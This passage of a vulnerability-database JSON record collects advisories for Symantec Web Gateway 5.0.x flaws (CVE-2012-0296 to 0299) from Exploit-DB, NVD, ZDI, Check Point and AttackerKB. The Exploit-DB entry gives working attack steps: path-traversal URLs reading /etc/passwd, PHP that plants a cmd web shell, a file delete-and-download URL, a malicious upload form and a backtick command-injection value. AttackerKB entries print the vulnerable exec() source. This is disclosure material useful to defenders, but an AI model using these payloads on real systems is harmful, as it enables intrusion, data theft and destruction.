10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2023-12-03T16:43:29", "description": "", "cvss3": {}, "published": "2012-06-27T00:00:00", "type": "exploitdb", "title": "symantec Web gateway 5.0.2.8 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2012-0297", "2012-0298", "CVE-2012-0297", "CVE-2012-0298"], "modified": "2012-06-27T00:00:00", "id": "EDB-ID:19406", "href": "https://www.exploit-db.com/exploits/19406", "sourceData": "Software: Symantec Web Gateway\r\nCurrent Software Version: 5.0.2.8\r\nProduct homepage: www.symantec.com\r\nAuthor: S2 Crew [Hungary]\r\nCVE: CVE-2012-0297, CVE-2012-0298, ???\r\n\r\nFile include:\r\n https://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd\r\n\r\nFile include and OS command execution:\r\n http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd\r\n You can execute OS commands just include the error_log:\r\n /usr/local/apache2/logs/\r\n -rw-r--r-- 1 root root 5925 Nov 15 07:25 access_log\r\n -rw-r--r-- 1 root root 3460 Nov 15 07:21 error_log\r\n\r\n Make a connection to port 80:\r\n <?php\r\n $f = fopen('/var/www/html/spywall/cleaner/cmd.php','w');\r\n $cmd = \"<?php system(\\$_GET['cmd']); ?>\";\r\n fputs($f,$cmd);\r\n fclose($f);\r\n\t\tprint \"Shell creation done<br>\";\r\n ?>\r\n\r\nArbitary file download and delete:\r\n https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog\r\n\td parameter: the complete filename \r\n After the download process application removes the original file with root access! 
:)\r\n\r\n Command execution methods:\r\n 1.Method\r\n Download and delete the /var/www/html/ciu/.htaccess file.\r\n After it you can access the ciu interface on web.\r\n There is an upload script: /ciu/uploadFile.php\r\n\tUser can control the filename and the upload location:\r\n $_FILES['uploadFile'];\r\n $_POST['uploadLocation'];\r\n\r\n 2.Method\r\n <form action=\"https://192.168.82.192/ciu/remoteRepairs.php\" method=\"POST\" enctype=\"multipart/form-data\">\r\n <input type=\"file\" name=\"uploadFile\">\r\n <input type=\"text\" name=\"action\" value=\"upload\">\r\n <input type=\"text\" name=\"uploadLocation\" value=\"/var/www/html/spywall/cleaner/\">\r\n <input type=\"hidden\" name=\"configuration\" value=\"test\">\r\n <input type=\"submit\" value=\"upload!\">\r\n </form>\r\n\t\r\n\tThe \"/var/www/html/spywall/cleaner\" is writeable by www-data.\r\n\r\nCommand execution after authentication:\r\n\r\n http://192.168.82.207/spywall/adminConfig.php (this is deprecated config file, it should be remove)\r\n\r\n From the modified POST message:\r\n Content-Disposition: form-data; name=\"pingaddress\"\r\n 127.0.0.1`whoami>/tmp/1234.txt`", "sourceHref": "https://www.exploit-db.com/raw/19406", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "prion": [{"lastseen": "2023-11-22T04:33:10", "description": "The file-management scripts in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to (1) read or (2) delete arbitrary files via unspecified vectors.", "cvss3": {}, "published": "2012-05-21T20:55:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0298"], "modified": "2017-12-05T02:29:00", "id": "PRION:CVE-2012-0298", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2012-0298", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2023-11-22T04:33:08", "description": "The file-management scripts in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to upload arbitrary code to a designated pathname, and possibly execute this code, via unspecified vectors.", "cvss3": {}, "published": "2012-05-21T20:55:00", "type": "prion", "title": "Code injection", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0299"], "modified": "2017-12-05T02:29:00", "id": "PRION:CVE-2012-0299", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2012-0299", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T04:33:09", "description": "The management GUI in Symantec Web Gateway 5.0.x before 5.0.3 does not properly restrict access to application scripts, which allows remote attackers to execute arbitrary code by (1) injecting crafted data or (2) including crafted data.", "cvss3": {}, "published": "2012-05-21T20:55:00", "type": "prion", "title": "Code injection", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2017-12-05T02:29:00", "id": "PRION:CVE-2012-0297", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2012-0297", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T04:33:09", "description": "Multiple cross-site scripting (XSS) vulnerabilities in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.", "cvss3": {}, "published": "2012-05-21T20:55:00", "type": "prion", "title": "Cross site scripting", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0296"], "modified": "2012-05-22T16:37:00", "id": "PRION:CVE-2012-0296", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2012-0296", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "zdi": [{"lastseen": "2023-12-03T17:03:53", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Symantec Web Gateway. Authentication is not required to exploit this vulnerability. 
The specific flaw exists because Symantec Web Gateway allows unauthenticated users to upload a file while preserving the file extension. This allows users to upload additional script files that can be used to execute remote code from user supplied commands under the context of the webserver.", "cvss3": {}, "published": "2012-06-08T00:00:00", "type": "zdi", "title": "Symantec Web Gateway upload_file Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0299"], "modified": "2012-06-08T00:00:00", "id": "ZDI-12-091", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-091/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T17:03:54", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Symantec Web Gateway. Authentication is not required to exploit this vulnerability. The specific flaw exists due to insufficiently filtered user-supplied data used in a call to exec() in multiple script pages. The affected scripts are located in '/spywall/ipchange.php' and 'network.php'. 
There is also a flaw in '/spywall/download_file.php' that allows unauthenticated users to download and delete any file on the server.", "cvss3": {}, "published": "2012-06-08T00:00:00", "type": "zdi", "title": "Symantec Web Gateway Shell Command Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2012-06-08T00:00:00", "id": "ZDI-12-090", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-090/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-11-28T07:11:53", "description": "An arbitrary code execution vulnerability has been reported in the management GUI in Symantec Web Gateway.", "cvss3": {}, "published": "2012-11-25T00:00:00", "type": "checkpoint_advisories", "title": "Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload (CVE-2012-0299)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0299"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2012-824", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-28T07:12:38", "description": "A remote command execution vulnerability has been reported in Symantec Web Gateway. The vulnerability is due to improper input validation by the web server. A remote attacker can exploit this issue by sending a specially crafted HTTP request to the affected server. 
Successful exploitation could result in attacker-controlled PHP script or shell command execution in the context of the target server.", "cvss3": {}, "published": "2012-07-16T00:00:00", "type": "checkpoint_advisories", "title": "Symantec Web Gateway Management Console Remote Shell Command Execution (CVE-2012-0297)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2016-09-26T00:00:00", "id": "CPAI-2012-311", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-28T07:09:11", "description": "Multiple cross-site scripting vulnerabilities have been reported in Symantec Web Gateway.", "cvss3": {}, "published": "2012-07-02T00:00:00", "type": "checkpoint_advisories", "title": "Symantec Web Gateway timer.php Multiple Reflected Cross-site Scripting (CVE-2012-0296)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0296"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2012-293", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2023-12-03T15:05:29", "description": "The file-management scripts in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to upload arbitrary code to a designated pathname, and possibly execute this code, via unspecified vectors.", "cvss3": {}, "published": "2012-05-21T20:55:00", "type": "cve", "title": "CVE-2012-0299", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0299"], "modified": "2017-12-05T02:29:00", "cpe": ["cpe:/a:symantec:web_gateway:5.0", "cpe:/a:symantec:web_gateway:5.0.1", "cpe:/a:symantec:web_gateway:5.0.2"], "id": "CVE-2012-0299", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0299", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:symantec:web_gateway:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:symantec:web_gateway:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:symantec:web_gateway:5.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T15:05:29", "description": "The file-management scripts in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to (1) read or (2) delete arbitrary files via unspecified vectors.", "cvss3": {}, "published": "2012-05-21T20:55:00", "type": "cve", "title": "CVE-2012-0298", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0298"], "modified": "2017-12-05T02:29:00", "cpe": ["cpe:/a:symantec:web_gateway:5.0", "cpe:/a:symantec:web_gateway:5.0.1", 
"cpe:/a:symantec:web_gateway:5.0.2"], "id": "CVE-2012-0298", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0298", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:a:symantec:web_gateway:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:symantec:web_gateway:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:symantec:web_gateway:5.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T15:05:27", "description": "The management GUI in Symantec Web Gateway 5.0.x before 5.0.3 does not properly restrict access to application scripts, which allows remote attackers to execute arbitrary code by (1) injecting crafted data or (2) including crafted data.", "cvss3": {}, "published": "2012-05-21T20:55:00", "type": "cve", "title": "CVE-2012-0297", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2017-12-05T02:29:00", "cpe": ["cpe:/a:symantec:web_gateway:5.0", "cpe:/a:symantec:web_gateway:5.0.1", "cpe:/a:symantec:web_gateway:5.0.2"], "id": "CVE-2012-0297", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0297", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:symantec:web_gateway:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:symantec:web_gateway:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:symantec:web_gateway:5.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T15:05:26", "description": "Multiple cross-site scripting (XSS) vulnerabilities in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to inject 
arbitrary web script or HTML via unspecified vectors.", "cvss3": {}, "published": "2012-05-21T20:55:00", "type": "cve", "title": "CVE-2012-0296", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0296"], "modified": "2012-05-22T16:37:00", "cpe": ["cpe:/a:symantec:web_gateway:5.0", "cpe:/a:symantec:web_gateway:5.0.1", "cpe:/a:symantec:web_gateway:5.0.2"], "id": "CVE-2012-0296", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0296", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:symantec:web_gateway:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:symantec:web_gateway:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:symantec:web_gateway:5.0.1:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2021-07-20T20:13:27", "description": "The file-management scripts in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to upload arbitrary code to a designated pathname, and possibly execute this code, via unspecified vectors.\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\nThis vulnerability allows remote attackers to execute arbitrary code on vulnerable installations \nof Symantec Web Gateway. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists because Symantec Web Gateway allows unauthenticated users to upload a file \nwhile preserving the file extension. 
This allows users to upload additional script files that can \nbe used to execute remote code from user supplied commands under the context of the webserver.\n\n## Details\n\n**blocked_file**\n \n \n <?php\n \tinclude_once(\"config/conf.php\");\n \tinclude_once(\"config/db.php\");\n \tinclude_once(\"includes/util_functions.php\");\n \n \n \tif (isset($_POST['submitted']))\n \t{\n \t\t$updated = true;\n \t\tunescape_form_vals(); // remove slashes form values\tas we are displaying only\n \n \t\t$new_image = $_FILES['new_image'];\n \t\t$before_filename = $_POST['before_filename'];\n \t\t$after_filename = $_POST['after_filename'];\n \n \t\t$image_query = \"select value from mi5_blockpagemsg where name='image_name'\";\n \t\t$image_result = @mysql_query($image_query);\n \t\t$image_row = @mysql_fetch_assoc($image_result);\n \t\t$old_image_name = $image_row['value'];\n \t\t@mysql_free_result($image_result);\n \t\t$image_name = $old_image_name;\n \t\t$image_url = $upload_image_url . \"/\". $image_name;\n \n \t\tif ($new_image['error'] == UPLOAD_ERR_OK && $new_image['size'] > 0) // file is uploaded\n \t\t{\n \t\t\t$return_arr = upload_file($new_image, $upload_image_path_temp, \"temp\");\n \t\t\tif ($return_arr['uploaded'])\n \t\t\t{\n \t\t\t\t$image_name = $return_arr['new_file_name'];\n \t\t\t\t$image_url = $upload_image_url_temp . \"/\". $image_name;\n \t\t\t}\n \t\t}\n \t}\n \n ?>\n <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n <html xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n <title>Blocked File Download</title>\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\" />\n <link rel=\"stylesheet\" href=\"styles/mi5.css\" />\n </head>\n \n <body>\n <div id=\"mainContent\">\n \n <div id=\"mainText\">\n <?php\n \n \t\t\t\tif ($image_name == '')\n \t\t\t\t{\n \t\t\t\t\t$image_url = \"images/mi5.gif\";\n \t\t\t\t}\n \n \t\t\t?>\n <img src=\"<?php echo $image_url . 
\"?t=\".time(); ?>\" alt=\"Symantec Defense Centre\" style=\"border: 1px solid #ddd;\" /> <hr noshade=\"noshade\" size=\"1\" style=\"margin-bottom: 10px;\" />\n <table><tr><!--<td valign=\"top\" style=\"width: 120px;\">\n \n <p><a href=\"javascript:history.go(-1);\">« Previous Page</a></p>\n \n </td>-->\n \n <td style=\"padding-left: 15px; border-left: 1px solid #999;\">\n <h3>Symantec Enterprise Spygate</h3>\n <h1>Downloading this file is prohibited</h1>\n <p><?php echo $before_filename; ?> %%File%%<?php echo $after_filename; ?></p>\n \n <p>If you think this spyware detection was in error, please click here.</p>\n \n </td></tr></table>\n \n </div>\n <div class=\"copyright\">© Copyright 2004-2006, Symantec</div>\n </div>\n \n \n </body>\n </html>\n \n\n**blocked_url**\n \n \n <?php\n \tinclude_once(\"config/conf.php\");\n \tinclude_once(\"config/db.php\");\n \tinclude_once(\"includes/util_functions.php\");\n \n \n \tif (isset($_POST['submitted']))\n \t{\n \t\t$updated = true;\n \t\tunescape_form_vals(); // remove slashes form values\tas we are displaying only\n \n \t\t$new_image = $_FILES['new_image'];\n \t\t$before_url = $_POST['before_url'];\n \t\t$after_url = $_POST['after_url'];\n \n \t\t$image_query = \"select value from mi5_blockpagemsg where name='image_name'\";\n \t\t$image_result = @mysql_query($image_query);\n \t\t$image_row = @mysql_fetch_assoc($image_result);\n \t\t$old_image_name = $image_row['value'];\n \t\t@mysql_free_result($image_result);\n \t\t$image_name = $old_image_name;\n \t\t$image_url = $upload_image_url . \"/\". $image_name;\n \n \t\tif ($new_image['error'] == UPLOAD_ERR_OK && $new_image['size'] > 0) // file is uploaded\n \t\t{\n \t\t\t$return_arr = upload_file($new_image, $upload_image_path_temp, \"temp\");\n \t\t\tif ($return_arr['uploaded'])\n \t\t\t{\n \t\t\t\t$image_name = $return_arr['new_file_name'];\n \t\t\t\t$image_url = $upload_image_url_temp . \"/\". 
$image_name;\n \t\t\t}\n \t\t}\n \t}\n \n ?>\n \n <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n <html xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n <title>Blocked URL</title>\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\" />\n <link rel=\"stylesheet\" href=\"styles/mi5.css\" />\n </head>\n \n <body>\n <div id=\"mainContent\">\n \n <div id=\"mainText\">\n <?php\t\t\t\tif ($image_name == '')\n \t\t\t\t{\n \t\t\t\t\t$image_url = \"images/mi5.gif\";\n \t\t\t\t}\n \n \t\t\t?>\n <img src=\"<?php echo $image_url . \"?t=\".time(); ?>\" alt=\"Symantec Defense Centre\" style=\"border: 1px solid #ddd;\" /> <hr noshade=\"noshade\" size=\"1\" style=\"margin-bottom: 10px;\" />\n <table><tr><!--<td valign=\"top\" style=\"width: 120px;\">\n \n <p><a href=\"javascript:history.go(-1);\">« Previous Page</a></p>\n \n </td>-->\n \n <td style=\"padding-left: 15px; border-left: 1px solid #999;\">\n <h3>Symantec Enterprise Spygate</h3>\n <h1>Accessing web pages from this URL is prohibited</h1>\n <p><?php echo $before_url; ?> %%URL%%<?php echo $after_url; ?></p>\n \n <p>If you think this spyware detection was in error, please click here.</p>\n \n </td></tr></table>\n \n </div>\n <div class=\"copyright\">© Copyright 2004-2006, Symantec</div>\n </div>\n \n \n </body>\n </html>\n \n\nAssessed Attacker Value: 0\n", "edition": 2, "cvss3": {}, "published": "2012-05-21T00:00:00", "type": "attackerkb", "title": "Symantec Web Gateway upload_file Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, 
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0299"], "modified": "2020-02-13T00:00:00", "id": "AKB:E371A741-0446-47E4-97E5-21715E5EA84A", "href": "https://attackerkb.com/topics/W0hUuAVM1c/symantec-web-gateway-upload-file-remote-code-execution-vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T20:13:31", "description": "The management GUI in Symantec Web Gateway 5.0.x before 5.0.3 does not properly restrict access to application scripts, which allows remote attackers to execute arbitrary code by (1) injecting crafted data or (2) including crafted data.\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\n\u2014\\\" >> logging\"); \nexec(\"echo \\\"route >> logging\\\" >> networkScript\"); \necho \"executing script`<br/>`\"; \nexec(\"./networkScript\"); \n?> \n`</body>` \n`</html>`\n \n \n Analysis of the command injection\n \n \n\necho \"ifconfig eth0 netmask \". $HTTP_POST_VARS[\"subnet\"] .\" \". 
$HTTP_POST_VARS[\"ip\"] .\";\" >> networkScript\n \n \n \n\n\";\" + payload.encoded + \";#\"\n \n \n **/spywall/network.php**\n \n ```php\n <?php\n \n require_once('includes/spywall_api.php');\n /*\n $wan = 'eth0';\n $lan = 'eth1';\n $management = 'eth2';\n $mon = 'eth3';\n $savename = '';\n \n $model = exec('cat /tmp/appliancemodel');\n if ($model == '007' || $model == '009') {\n \t// different ethernet device numbers for these models\n \t$management = 'eth0';\n \t$mon = 'eth3';\n \t$wan = 'eth5';\n \t$lan = 'eth6';\n }\n */\n $portMap = getPortMap();\n $management = $portMap['mgmt'];\n $mon = $portMap['monitor'];\n $wan = $portMap['wan'];\n $lan = $portMap['lan'];\n \n $device = '';\n if ($_POST['name'] == 'lan') {\n \t$device = $lan;\n \t$savename = 'LAN';\n } else if ($_POST['name'] == 'wan') {\n \t$device = $wan;\n \t$savename = 'WAN';\n } else if ($_POST['name'] == 'monitor') {\n \t$device = $mon;\n \t$savename = 'MON';\n } else {\n \t$device = $management;\n \t$savename = 'MAN';\n }\n \n if (strlen($device)) {\n \t// set autonegotiation, duplex (if it isn't set to unknown),\n \t// and speed (if it isn't set to unknown)\n \texec(\"sudo /sbin/ethtool -s $device autoneg \". $_POST['auto'] .((isset($_POST['duplex']) && $_POST['duplex'] != 'unknown')?(\" duplex \". $_POST['duplex']):'') .((isset($_POST['speed']) && $_POST['speed'] != 'unknown')?(\" speed \". $_POST['speed']):''));\n \n exec(\"sudo /bin/rm -f /home/admin/autoconfig\". $savename);\n \t// save info to autoconfig file\n \texec(\"echo \\\"/sbin/ethtool -s $device autoneg \". $_POST['auto'] .((isset($_POST['duplex']) && $_POST['duplex'] != 'unknown')?(\" duplex \". $_POST['duplex']):'') .((isset($_POST['speed']) && $_POST['speed'] != 'unknown')?(\" speed \". $_POST['speed']):'') .\"\\\" > /home/admin/autoconfig\". $savename);\n //\techo \"\\\"/sbin/ethtool -s $device autoneg \". $_POST['auto'] .(($_POST['duplex'] != 'unknown')?(\" duplex \". 
$_POST['duplex']):'') .(($_POST['speed'] != 'unknown')?(\" speed \". $_POST['speed']):'') .\"\\\" > /home/admin/autoconfig\". $savename;\n \tsleep(5);\t// we sleep because otherwise we get back before the changes take effect\n }\n \n ?>\n <script language=\"javascript\"> window.location=\"admin_advanced.php\";</script>\n \n\nAssessed Attacker Value: 0\n", "edition": 2, "cvss3": {}, "published": "2012-05-21T00:00:00", "type": "attackerkb", "title": "CVE-2012-0297 Symantec Web Gateway Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": 